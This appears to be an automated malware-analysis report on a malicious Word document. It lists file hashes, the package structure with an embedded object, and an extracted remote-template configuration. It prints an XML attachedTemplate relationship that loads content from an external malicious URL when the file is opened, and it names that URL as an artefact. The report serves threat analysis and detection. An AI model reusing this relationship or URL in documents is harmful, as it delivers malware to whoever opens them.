Characteristics
Hash | Hash Value |
---|---|
MD5 | 828cfd8f73c40445cd3f6587729da514 |
Sha1 | b7eb2ade1107c0fdf2f4a933eaa8f865896d0c3a |
Sha256 | f934b28bb323edd41edecc32c7f9acc2f24614688758a27f92bd40f63deffc7a |
Sha384 | 0bc2eb912a3d566a6fd32106f11cd0c6eb9892a38198cf64c601f1f0d12774c2a98507be1b7e240de22d0e0f148c1af6 |
Sha512 | 02c0739601694c6efbfac805aa9b5acd0d4904a83ef3ff2acb44bb4de1cf3fd63370edf6daf9fdffa3e6c49a46a56242fa50716068a6d46b0e3f142f67b49413 |
SSDeep | 6144:vprNVxQ2CjOwmQCveoScrMn1pBbhRWnCkh6xw6h7nlSjY5YqcvT:hrNchCvvBrQhFoi7EIwT |
TLSH | D554239E57B814BCCB2B0FBD73C8421DE2D04A8D6567CE4B3A221ADCF31866A4583775 |
File Structure
828cfd8f73c40445cd3f6587729da514 (Malicious)
[Content_Types].xml
_rels
.rels
word (Malicious)
_rels (Malicious)
document.xml.rels
footer2.xml.rels
document.xml
footnotes.xml
footer3.xml
footer2.xml
header3.xml
endnotes.xml
embeddings (Malicious)
Root Entry (Malicious)
ObjInfo
[Content_Types].xml
_rels
.rels
xl
_rels
workbook.xml.rels
workbook.xml
worksheets
theme
theme1.xml
styles.xml
sharedStrings.xml
calcChain.xml
printerSettings
printerSettings1.bin
media
image1.emf
theme
theme1.xml
settings.xml
webSettings.xml
fontTable.xml
styles.xml
Malware Configuration - Remote Template
Config. Field | Value |
---|---|
Target | https://getabre.com/xnjCQL |
Path | settings.xml.rels |
XPath | /Relationships/Relationship |
Outer XML | <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://getabre.com/xnjCQL" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" /> |
Artefacts
Name | Value |
---|---|
Remote Template - Highly Suspicious | https://getabre.com/xnjCQL |
828cfd8f73c40445cd3f6587729da514 (293.97 KB)
Artefacts
Name | Value | Location |
---|---|---|
Remote Template - Highly Suspicious | https://getabre.com/xnjCQL (Malicious) | 828cfd8f73c40445cd3f6587729da514 > word > _rels > settings.xml.rels |